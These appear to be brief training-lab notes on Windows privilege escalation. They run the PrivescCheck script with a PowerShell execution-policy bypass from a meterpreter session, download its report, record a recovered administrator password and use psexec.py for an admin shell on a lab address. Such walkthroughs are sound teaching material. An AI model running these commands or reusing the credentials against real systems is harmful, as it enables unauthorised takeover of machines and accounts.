PrivescCheck script

#Privilege Escalation

cd C:\\Users\\student\\Desktop\\PrivescCheck
shell
dir
# Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

# Extended Mode + Export Txt Report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
exit
meterpreter > download PrivescCheck_ATTACKDEFENSE.txt

root@attackdefense:~# featherpad PrivescCheck_ATTACKDEFENSE.txt

📌 administrator:hello_123321

Administrator Login

  • Use the administrator account to run a privileged cmd session, authenticating legitimately over SMB

psexec.py administrator@10.2.29.53 cmd.exe
